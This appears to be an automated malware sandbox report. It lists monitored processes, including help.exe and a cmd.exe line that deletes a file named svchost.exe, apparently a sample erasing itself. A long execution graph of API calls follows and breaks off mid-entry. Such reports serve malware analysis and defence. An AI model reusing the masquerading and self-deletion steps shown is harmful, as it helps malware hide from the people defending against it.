                                                                                            Target ID:5
                                                                                            Start time:13:13:14
                                                                                            Start date:03/05/2024
                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2188 --field-trial-handle=1992,i,10683895561274057007,5878391015423285478,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                            Imagebase:0x7ff76e190000
                                                                                            File size:3'242'272 bytes
                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:false

                                                                                            Target ID:6
                                                                                            Start time:13:13:18
                                                                                            Start date:03/05/2024
                                                                                            Path:C:\Windows\SysWOW64\help.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\SysWOW64\help.exe"
                                                                                            Imagebase:0x5d0000
                                                                                            File size:10'240 bytes
                                                                                            MD5 hash:DD40774E56D4C44B81F2DFA059285E75
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:moderate
                                                                                            Has exited:false

                                                                                            Target ID:7
                                                                                            Start time:13:13:22
                                                                                            Start date:03/05/2024
                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:/c del "C:\Windows\SysWOW64\svchost.exe"
                                                                                            Imagebase:0x240000
                                                                                            File size:236'544 bytes
                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:8
                                                                                            Start time:13:13:22
                                                                                            Start date:03/05/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff70f330000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:12
                                                                                            Start time:13:13:33
                                                                                            Start date:03/05/2024
                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1988 --field-trial-handle=1992,i,10683895561274057007,5878391015423285478,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:2
                                                                                            Imagebase:0x7ffe12890000
                                                                                            File size:3'242'272 bytes
                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:false

                                                                                            Target ID:13
                                                                                            Start time:13:13:41
                                                                                            Start date:03/05/2024
                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            Wow64 process (32bit):
                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2548 --field-trial-handle=1992,i,10683895561274057007,5878391015423285478,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                            Imagebase:
                                                                                            File size:3'242'272 bytes
                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:false

                                                                                            Target ID:14
                                                                                            Start time:13:13:48
                                                                                            Start date:03/05/2024
                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            Wow64 process (32bit):
                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --disable-nacl --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --time-ticks-at-unix-epoch=-1714734611839441 --launch-time-ticks=182597864 --mojo-platform-channel-handle=3040 --field-trial-handle=1992,i,10683895561274057007,5878391015423285478,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:1
                                                                                            Imagebase:
                                                                                            File size:3'242'272 bytes
                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:false

                                                                                            Target ID:15
                                                                                            Start time:13:13:53
                                                                                            Start date:03/05/2024
                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            Wow64 process (32bit):
                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --disable-nacl --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --time-ticks-at-unix-epoch=-1714734611839441 --launch-time-ticks=182602404 --mojo-platform-channel-handle=3016 --field-trial-handle=1992,i,10683895561274057007,5878391015423285478,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:1
                                                                                            Imagebase:
                                                                                            File size:3'242'272 bytes
                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:false

                                                                                            Target ID:16
                                                                                            Start time:13:14:00
                                                                                            Start date:03/05/2024
                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            Wow64 process (32bit):
                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --enable-chrome-cart --disable-nacl --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=9 --time-ticks-at-unix-epoch=-1714734611839441 --launch-time-ticks=182837962 --mojo-platform-channel-handle=4392 --field-trial-handle=1992,i,10683895561274057007,5878391015423285478,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:1
                                                                                            Imagebase:
                                                                                            File size:3'242'272 bytes
                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:false

                                                                                            Target ID:17
                                                                                            Start time:13:14:06
                                                                                            Start date:03/05/2024
                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            Wow64 process (32bit):
                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --disable-nacl --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=10 --time-ticks-at-unix-epoch=-1714734611839441 --launch-time-ticks=183415711 --mojo-platform-channel-handle=4880 --field-trial-handle=1992,i,10683895561274057007,5878391015423285478,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:1
                                                                                            Imagebase:
                                                                                            File size:3'242'272 bytes
                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:false

                                                                                            Reset < >

                                                                                              Execution Graph

                                                                                              Execution Coverage:3.3%
                                                                                              Dynamic/Decrypted Code Coverage:0.4%
                                                                                              Signature Coverage:3%
                                                                                              Total number of Nodes:2000
                                                                                              Total number of Limit Nodes:39
                                                                                              execution_graph 96243 e1cad SystemParametersInfoW 96244 e1044 96249 e10f3 96244->96249 96246 e104a 96285 1000a3 29 API calls __onexit 96246->96285 96248 e1054 96286 e1398 96249->96286 96253 e116a 96296 ea961 96253->96296 96256 ea961 22 API calls 96257 e117e 96256->96257 96258 ea961 22 API calls 96257->96258 96259 e1188 96258->96259 96260 ea961 22 API calls 96259->96260 96261 e11c6 96260->96261 96262 ea961 22 API calls 96261->96262 96263 e1292 96262->96263 96301 e171c 96263->96301 96267 e12c4 96268 ea961 22 API calls 96267->96268 96269 e12ce 96268->96269 96322 f1940 96269->96322 96271 e12f9 96332 e1aab 96271->96332 96273 e1315 96274 e1325 GetStdHandle 96273->96274 96275 e137a 96274->96275 96276 122485 96274->96276 96279 e1387 OleInitialize 96275->96279 96276->96275 96277 12248e 96276->96277 96339 ffddb 96277->96339 96279->96246 96280 122495 96349 15011d InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 96280->96349 96282 12249e 96350 150944 CreateThread 96282->96350 96284 1224aa CloseHandle 96284->96275 96285->96248 96351 e13f1 96286->96351 96289 e13f1 22 API calls 96290 e13d0 96289->96290 96291 ea961 22 API calls 96290->96291 96292 e13dc 96291->96292 96358 e6b57 96292->96358 96294 e1129 96295 e1bc3 6 API calls 96294->96295 96295->96253 96297 ffe0b 22 API calls 96296->96297 96298 ea976 96297->96298 96299 ffddb 22 API calls 96298->96299 96300 e1174 96299->96300 96300->96256 96302 ea961 22 API calls 96301->96302 96303 e172c 96302->96303 96304 ea961 22 API calls 96303->96304 96305 e1734 96304->96305 96306 ea961 22 API calls 96305->96306 96307 e174f 96306->96307 96308 ffddb 22 API calls 96307->96308 96309 e129c 96308->96309 96310 e1b4a 96309->96310 96311 e1b58 96310->96311 96312 ea961 22 API calls 96311->96312 96313 e1b63 96312->96313 96314 ea961 22 API calls 96313->96314 96315 e1b6e 96314->96315 96316 ea961 22 API calls 96315->96316 96317 e1b79 96316->96317 96318 ea961 22 API calls 96317->96318 96319 e1b84 96318->96319 96320 ffddb 22 API calls 96319->96320 96321 e1b96 RegisterWindowMessageW 96320->96321 96321->96267 96323 f195d 96322->96323 96324 f1981 96322->96324 96331 f196e 96323->96331 96405 100242 5 API calls __Init_thread_wait 96323->96405 96403 100242 5 API calls __Init_thread_wait 96324->96403 96327 f198b 96327->96323 96404 1001f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96327->96404 96329 f8727 96329->96331 96406 1001f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96329->96406 96331->96271 96333 e1abb 96332->96333 96334 12272d 96332->96334 96335 ffddb 22 API calls 96333->96335 96407 153209 23 API calls 96334->96407 96338 e1ac3 96335->96338 96337 122738 96338->96273 96342 ffde0 96339->96342 96340 10ea0c ___std_exception_copy 21 API calls 96340->96342 96341 ffdfa 96341->96280 96342->96340 96342->96341 96345 ffdfc 96342->96345 96408 104ead 7 API calls 2 library calls 96342->96408 96344 10066d 96410 1032a4 RaiseException 96344->96410 96345->96344 96409 1032a4 RaiseException 96345->96409 96348 10068a 96348->96280 96349->96282 96350->96284 96411 15092a 28 API calls 96350->96411 96352 ea961 22 API calls 96351->96352 96353 e13fc 96352->96353 96354 ea961 22 API calls 96353->96354 96355 e1404 96354->96355 96356 ea961 22 API calls 96355->96356 96357 e13c6 96356->96357 96357->96289 96359 124ba1 96358->96359 96360 e6b67 _wcslen 96358->96360 96381 e93b2 96359->96381 96363 e6b7d 96360->96363 96364 e6ba2 96360->96364 96362 124baa 96362->96362 96370 e6f34 22 API calls 96363->96370 96366 ffddb 22 API calls 96364->96366 96367 e6bae 96366->96367 96371 ffe0b 96367->96371 96369 e6b85 __fread_nolock 96369->96294 96370->96369 96374 ffddb 96371->96374 96373 ffdfa 96373->96369 96374->96373 96377 ffdfc 96374->96377 96385 10ea0c 96374->96385 96392 104ead 7 API calls 2 library calls 96374->96392 96376 10066d 96394 1032a4 RaiseException 96376->96394 96377->96376 96393 1032a4 RaiseException 96377->96393 96380 10068a 96380->96369 96382 e93c9 __fread_nolock 96381->96382 96383 e93c0 96381->96383 96382->96362 96383->96382 96397 eaec9 96383->96397 96390 113820 pre_c_initialization 96385->96390 96386 11385e 96396 10f2d9 20 API calls _abort 96386->96396 96388 113849 RtlAllocateHeap 96389 11385c 96388->96389 96388->96390 96389->96374 96390->96386 96390->96388 96395 104ead 7 API calls 2 library calls 96390->96395 96392->96374 96393->96376 96394->96380 96395->96390 96396->96389 96398 eaedc 96397->96398 96402 eaed9 __fread_nolock 96397->96402 96399 ffddb 22 API calls 96398->96399 96400 eaee7 96399->96400 96401 ffe0b 22 API calls 96400->96401 96401->96402 96402->96382 96403->96327 96404->96323 96405->96329 96406->96331 96407->96337 96408->96342 96409->96344 96410->96348 96412 edee5 96415 eb710 96412->96415 96416 eb72b 96415->96416 96417 130146 96416->96417 96418 1300f8 96416->96418 96430 eb750 96416->96430 96481 1658a2 256 API calls 2 library calls 96417->96481 96421 130102 96418->96421 96424 13010f 96418->96424 96418->96430 96479 165d33 256 API calls 96421->96479 96437 eba20 96424->96437 96480 1661d0 256 API calls 2 library calls 96424->96480 96427 1303d9 96427->96427 96429 ebbe0 40 API calls 96429->96430 96430->96429 96433 eba4e 96430->96433 96434 130322 96430->96434 96430->96437 96442 fd336 40 API calls 96430->96442 96446 eec40 96430->96446 96470 ea81b 41 API calls 96430->96470 96471 fd2f0 40 API calls 96430->96471 96472 fa01b 256 API calls 96430->96472 96473 100242 5 API calls __Init_thread_wait 96430->96473 96474 fedcd 22 API calls 96430->96474 96475 1000a3 29 API calls __onexit 96430->96475 96476 1001f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96430->96476 96477 fee53 82 API calls 96430->96477 96478 fe5ca 256 API calls 96430->96478 96482 eaceb 23 API calls messages 96430->96482 96483 13f6bf 23 API calls 96430->96483 96484 ea8c7 96430->96484 96488 165c0c 82 API calls 96434->96488 96437->96433 96489 15359c 82 API calls __wsopen_s 96437->96489 96442->96430 96465 eec76 messages 96446->96465 96447 ffddb 22 API calls 96447->96465 96448 134beb 96495 15359c 82 API calls __wsopen_s 96448->96495 96450 efef7 96456 ea8c7 22 API calls 96450->96456 96462 eed9d messages 96450->96462 96451 ef3ae messages 96451->96462 96492 15359c 82 API calls __wsopen_s 96451->96492 96453 134600 96460 ea8c7 22 API calls 96453->96460 96453->96462 96454 134b0b 96493 15359c 82 API calls __wsopen_s 96454->96493 96455 ea8c7 22 API calls 96455->96465 96456->96462 96459 100242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 96459->96465 96460->96462 96462->96430 96463 efbe3 96463->96451 96463->96462 96466 134bdc 96463->96466 96464 ea961 22 API calls 96464->96465 96465->96447 96465->96448 96465->96450 96465->96451 96465->96453 96465->96454 96465->96455 96465->96459 96465->96462 96465->96463 96465->96464 96467 1000a3 29 API calls pre_c_initialization 96465->96467 96469 1001f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 96465->96469 96490 f01e0 256 API calls 2 library calls 96465->96490 96491 f06a0 41 API calls messages 96465->96491 96494 15359c 82 API calls __wsopen_s 96466->96494 96467->96465 96469->96465 96470->96430 96471->96430 96472->96430 96473->96430 96474->96430 96475->96430 96476->96430 96477->96430 96478->96430 96479->96424 96480->96437 96481->96430 96482->96430 96483->96430 96485 ea8ea __fread_nolock 96484->96485 96486 ea8db 96484->96486 96485->96430 96486->96485 96487 ffe0b 22 API calls 96486->96487 96487->96485 96488->96437 96489->96427 96490->96465 96491->96465 96492->96462 96493->96462 96494->96448 96495->96462 96496 1190fa 96497 119107 96496->96497 96501 11911f 96496->96501 96553 10f2d9 20 API calls _abort 96497->96553 96499 11910c 96554 1127ec 26 API calls pre_c_initialization 96499->96554 96502 11917a 96501->96502 96510 119117 96501->96510 96555 11fdc4 21 API calls 2 library calls 96501->96555 96516 10d955 96502->96516 96505 119192 96523 118c32 96505->96523 96507 119199 96508 10d955 __fread_nolock 26 API calls 96507->96508 96507->96510 96509 1191c5 96508->96509 96509->96510 96511 10d955 __fread_nolock 26 API calls 96509->96511 96512 1191d3 96511->96512 96512->96510 96513 10d955 __fread_nolock 26 API calls 96512->96513 96514 1191e3 96513->96514 96515 10d955 __fread_nolock 26 API calls 96514->96515 96515->96510 96517 10d961 96516->96517 96518 10d976 96516->96518 96556 10f2d9 20 API calls _abort 96517->96556 96518->96505 96520 10d966 96557 1127ec 26 API calls pre_c_initialization 96520->96557 96522 10d971 96522->96505 96524 118c3e ___BuildCatchObject 96523->96524 96525 118c46 96524->96525 96526 118c5e 96524->96526 96624 10f2c6 20 API calls _abort 96525->96624 96528 118d24 96526->96528 96533 118c97 96526->96533 96631 10f2c6 20 API calls _abort 96528->96631 96530 118c4b 96625 10f2d9 20 API calls _abort 96530->96625 96531 118d29 96632 10f2d9 20 API calls _abort 96531->96632 96535 118ca6 96533->96535 96536 118cbb 96533->96536 96626 10f2c6 20 API calls _abort 96535->96626 96558 115147 EnterCriticalSection 96536->96558 96538 118cb3 96633 1127ec 26 API calls pre_c_initialization 96538->96633 96540 118cab 96627 10f2d9 20 API calls _abort 96540->96627 96541 118cc1 96543 118cf2 96541->96543 96544 118cdd 96541->96544 96559 118d45 96543->96559 96628 10f2d9 20 API calls _abort 96544->96628 96546 118c53 __fread_nolock 96546->96507 96549 118ce2 96629 10f2c6 20 API calls _abort 96549->96629 96550 118ced 96630 118d1c LeaveCriticalSection __wsopen_s 96550->96630 96553->96499 96554->96510 96555->96502 96556->96520 96557->96522 96558->96541 96560 118d57 96559->96560 96561 118d6f 96559->96561 96643 10f2c6 20 API calls _abort 96560->96643 96563 1190d9 96561->96563 96568 118db4 96561->96568 96665 10f2c6 20 API calls _abort 96563->96665 96564 118d5c 96644 10f2d9 20 API calls _abort 96564->96644 96567 1190de 96666 10f2d9 20 API calls _abort 96567->96666 96570 118dbf 96568->96570 96571 118d64 96568->96571 96575 118def 96568->96575 96645 10f2c6 20 API calls _abort 96570->96645 96571->96550 96572 118dcc 96667 1127ec 26 API calls pre_c_initialization 96572->96667 96574 118dc4 96646 10f2d9 20 API calls _abort 96574->96646 96578 118e08 96575->96578 96579 118e4a 96575->96579 96580 118e2e 96575->96580 96578->96580 96584 118e15 96578->96584 96650 113820 21 API calls 2 library calls 96579->96650 96647 10f2c6 20 API calls _abort 96580->96647 96583 118e33 96648 10f2d9 20 API calls _abort 96583->96648 96634 11f89b 96584->96634 96585 118e61 96651 1129c8 96585->96651 96589 118fb3 96592 119029 96589->96592 96596 118fcc GetConsoleMode 96589->96596 96590 118e3a 96649 1127ec 26 API calls pre_c_initialization 96590->96649 96591 118e6a 96594 1129c8 _free 20 API calls 96591->96594 96595 11902d ReadFile 96592->96595 96599 118e71 96594->96599 96600 1190a1 GetLastError 96595->96600 96601 119047 96595->96601 96596->96592 96598 118fdd 96596->96598 96597 118e45 __fread_nolock 96609 1129c8 _free 20 API calls 96597->96609 96598->96595 96602 118fe3 ReadConsoleW 96598->96602 96603 118e96 96599->96603 96604 118e7b 96599->96604 96605 119005 96600->96605 96606 1190ae 96600->96606 96601->96600 96607 11901e 96601->96607 96602->96607 96608 118fff GetLastError 96602->96608 96659 119424 28 API calls __fread_nolock 96603->96659 96657 10f2d9 20 API calls _abort 96604->96657 96605->96597 96660 10f2a3 20 API calls 2 library calls 96605->96660 96663 10f2d9 20 API calls _abort 96606->96663 96607->96597 96617 119083 96607->96617 96618 11906c 96607->96618 96608->96605 96609->96571 96614 118e80 96658 10f2c6 20 API calls _abort 96614->96658 96615 1190b3 96664 10f2c6 20 API calls _abort 96615->96664 96617->96597 96621 11909a 96617->96621 96661 118a61 31 API calls 3 library calls 96618->96661 96662 1188a1 29 API calls __fread_nolock 96621->96662 96623 11909f 96623->96597 96624->96530 96625->96546 96626->96540 96627->96538 96628->96549 96629->96550 96630->96546 96631->96531 96632->96538 96633->96546 96635 11f8a8 96634->96635 96636 11f8b5 96634->96636 96668 10f2d9 20 API calls _abort 96635->96668 96639 11f8c1 96636->96639 96669 10f2d9 20 API calls _abort 96636->96669 96638 11f8ad 96638->96589 96639->96589 96641 11f8e2 96670 1127ec 26 API calls pre_c_initialization 96641->96670 96643->96564 96644->96571 96645->96574 96646->96572 96647->96583 96648->96590 96649->96597 96650->96585 96652 1129d3 RtlFreeHeap 96651->96652 96656 1129fc _free 96651->96656 96653 1129e8 96652->96653 96652->96656 96671 10f2d9 20 API calls _abort 96653->96671 96655 1129ee GetLastError 96655->96656 96656->96591 96657->96614 96658->96597 96659->96584 96660->96597 96661->96597 96662->96623 96663->96615 96664->96597 96665->96567 96666->96572 96667->96571 96668->96638 96669->96641 96670->96638 96671->96655 96672 1003fb 96673 100407 ___BuildCatchObject 96672->96673 96701 ffeb1 96673->96701 96675 10040e 96676 100561 96675->96676 96679 100438 96675->96679 96728 10083f IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 96676->96728 96678 100568 96729 104e52 28 API calls _abort 96678->96729 96690 100477 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 96679->96690 96712 11247d 96679->96712 96681 10056e 96730 104e04 28 API calls _abort 96681->96730 96685 100576 96686 100457 96688 1004d8 96720 100959 96688->96720 96690->96688 96724 104e1a 38 API calls 2 library calls 96690->96724 96692 1004de 96693 1004f3 96692->96693 96725 100992 GetModuleHandleW 96693->96725 96695 1004fa 96695->96678 96696 1004fe 96695->96696 96697 100507 96696->96697 96726 104df5 28 API calls _abort 96696->96726 96727 100040 13 API calls 2 library calls 96697->96727 96700 10050f 96700->96686 96702 ffeba 96701->96702 96731 100698 IsProcessorFeaturePresent 96702->96731 96704 ffec6 96732 102c94 10 API calls 3 library calls 96704->96732 96706 ffecb 96711 ffecf 96706->96711 96733 112317 96706->96733 96709 ffee6 96709->96675 96711->96675 96715 112494 96712->96715 96713 100a8c CatchGuardHandler 5 API calls 96714 100451 96713->96714 96714->96686 96716 112421 96714->96716 96715->96713 96717 112450 96716->96717 96718 100a8c CatchGuardHandler 5 API calls 96717->96718 96719 112479 96718->96719 96719->96690 96801 102340 96720->96801 96722 10096c GetStartupInfoW 96723 10097f 96722->96723 96723->96692 96724->96688 96725->96695 96726->96697 96727->96700 96728->96678 96729->96681 96730->96685 96731->96704 96732->96706 96737 11d1f6 96733->96737 96736 102cbd 8 API calls 3 library calls 96736->96711 96740 11d213 96737->96740 96741 11d20f 96737->96741 96739 ffed8 96739->96709 96739->96736 96740->96741 96743 114bfb 96740->96743 96755 100a8c 96741->96755 96744 114c07 ___BuildCatchObject 96743->96744 96762 112f5e EnterCriticalSection 96744->96762 96746 114c0e 96763 1150af 96746->96763 96748 114c1d 96754 114c2c 96748->96754 96776 114a8f 29 API calls 96748->96776 96751 114c27 96777 114b45 GetStdHandle GetFileType 96751->96777 96752 114c3d __fread_nolock 96752->96740 96778 114c48 LeaveCriticalSection _abort 96754->96778 96756 100a95 96755->96756 96757 100a97 IsProcessorFeaturePresent 96755->96757 96756->96739 96759 100c5d 96757->96759 96800 100c21 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 96759->96800 96761 100d40 96761->96739 96762->96746 96764 1150bb ___BuildCatchObject 96763->96764 96765 1150c8 96764->96765 96766 1150df 96764->96766 96787 10f2d9 20 API calls _abort 96765->96787 96779 112f5e EnterCriticalSection 96766->96779 96769 1150cd 96788 1127ec 26 API calls pre_c_initialization 96769->96788 96770 1150eb 96775 115117 96770->96775 96780 115000 96770->96780 96773 1150d7 __fread_nolock 96773->96748 96789 11513e LeaveCriticalSection _abort 96775->96789 96776->96751 96777->96754 96778->96752 96779->96770 96790 114c7d 96780->96790 96782 11501f 96783 1129c8 _free 20 API calls 96782->96783 96785 115071 96783->96785 96784 115012 96784->96782 96797 113405 11 API calls 2 library calls 96784->96797 96785->96770 96787->96769 96788->96773 96789->96773 96795 114c8a pre_c_initialization 96790->96795 96791 114cca 96799 10f2d9 20 API calls _abort 96791->96799 96792 114cb5 RtlAllocateHeap 96793 114cc8 96792->96793 96792->96795 96793->96784 96795->96791 96795->96792 96798 104ead 7 API calls 2 library calls 96795->96798 96797->96784 96798->96795 96799->96793 96800->96761 96801->96722 96802 e2de3 96803 e2df0 __wsopen_s 96802->96803 96804 e2e09 96803->96804 96805 122c2b ___scrt_fastfail 96803->96805 96818 e3aa2 96804->96818 96808 122c47 GetOpenFileNameW 96805->96808 96809 122c96 96808->96809 96811 e6b57 22 API calls 96809->96811 96813 122cab 96811->96813 96813->96813 96815 e2e27 96846 e44a8 96815->96846 96875 121f50 96818->96875 96821 e3ace 96823 e6b57 22 API calls 96821->96823 96822 e3ae9 96881 ea6c3 96822->96881 96825 e3ada 96823->96825 96877 e37a0 96825->96877 96828 e2da5 96829 121f50 __wsopen_s 96828->96829 96830 e2db2 GetLongPathNameW 96829->96830 96831 e6b57 22 API calls 96830->96831 96832 e2dda 96831->96832 96833 e3598 96832->96833 96834 ea961 22 API calls 96833->96834 96835 e35aa 96834->96835 96836 e3aa2 23 API calls 96835->96836 96837 e35b5 96836->96837 96838 1232eb 96837->96838 96839 e35c0 96837->96839 96844 12330d 96838->96844 96899 fce60 41 API calls 96838->96899 96887 e515f 96839->96887 96845 e35df 96845->96815 96900 e4ecb 96846->96900 96849 123833 96922 152cf9 96849->96922 96850 e4ecb 94 API calls 96852 e44e1 96850->96852 96852->96849 96854 e44e9 96852->96854 96853 123848 96855 123869 96853->96855 96856 12384c 96853->96856 96858 123854 96854->96858 96859 e44f5 96854->96859 96857 ffe0b 22 API calls 96855->96857 96952 e4f39 96856->96952 96871 1238ae 96857->96871 96958 14da5a 82 API calls 96858->96958 96951 e940c 136 API calls 2 library calls 96859->96951 96863 123862 96863->96855 96864 e2e31 96865 e4f39 68 API calls 96868 123a5f 96865->96868 96868->96865 96963 14989b 82 API calls __wsopen_s 96868->96963 96871->96868 96872 e9cb3 22 API calls 96871->96872 96948 14967e 96871->96948 96959 1495ad 42 API calls _wcslen 96871->96959 96960 150b5a 22 API calls 96871->96960 96961 ea4a1 22 API calls __fread_nolock 96871->96961 96962 e3ff7 22 API calls 96871->96962 96872->96871 96876 e3aaf GetFullPathNameW 96875->96876 96876->96821 96876->96822 96878 e37ae 96877->96878 96879 e93b2 22 API calls 96878->96879 96880 e2e12 96879->96880 96880->96828 96882 ea6dd 96881->96882 96883 ea6d0 96881->96883 96884 ffddb 22 API calls 96882->96884 96883->96825 96885 ea6e7 96884->96885 96886 ffe0b 22 API calls 96885->96886 96886->96883 96888 e516e 96887->96888 96892 e518f __fread_nolock 96887->96892 96890 ffe0b 22 API calls 96888->96890 96889 ffddb 22 API calls 96891 e35cc 96889->96891 96890->96892 96893 e35f3 96891->96893 96892->96889 96894 e3605 96893->96894 96898 e3624 __fread_nolock 96893->96898 96897 ffe0b 22 API calls 96894->96897 96895 ffddb 22 API calls 96896 e363b 96895->96896 96896->96845 96897->96898 96898->96895 96899->96838 96964 e4e90 LoadLibraryA 96900->96964 96905 e4ef6 LoadLibraryExW 96972 e4e59 LoadLibraryA 96905->96972 96906 123ccf 96907 e4f39 68 API calls 96906->96907 96910 123cd6 96907->96910 96912 e4e59 3 API calls 96910->96912 96914 123cde 96912->96914 96913 e4f20 96913->96914 96915 e4f2c 96913->96915 96994 e50f5 96914->96994 96916 e4f39 68 API calls 96915->96916 96918 e44cd 96916->96918 96918->96849 96918->96850 96921 123d05 96923 152d15 96922->96923 96924 e511f 64 API calls 96923->96924 96925 152d29 96924->96925 97144 152e66 96925->97144 96928 e50f5 40 API calls 96929 152d56 96928->96929 96930 e50f5 40 API calls 96929->96930 96931 152d66 96930->96931 96932 e50f5 40 API calls 96931->96932 96933 152d81 96932->96933 96934 e50f5 40 API calls 96933->96934 96935 152d9c 96934->96935 96936 e511f 64 API calls 96935->96936 96937 152db3 96936->96937 96938 10ea0c ___std_exception_copy 21 API calls 96937->96938 96939 152dba 96938->96939 96940 10ea0c ___std_exception_copy 21 API calls 96939->96940 96941 152dc4 96940->96941 96942 e50f5 40 API calls 96941->96942 96943 152dd8 96942->96943 96944 1528fe 27 API calls 96943->96944 96945 152dee 96944->96945 96947 152d3f 96945->96947 97150 1522ce 96945->97150 96947->96853 96949 ffe0b 22 API calls 96948->96949 96950 1496ae __fread_nolock 96949->96950 96950->96871 96951->96864 96953 e4f43 96952->96953 96955 e4f4a 96952->96955 96954 10e678 67 API calls 96953->96954 96954->96955 96956 e4f6a FreeLibrary 96955->96956 96957 e4f59 96955->96957 96956->96957 96957->96858 96958->96863 96959->96871 96960->96871 96961->96871 96962->96871 96963->96868 96965 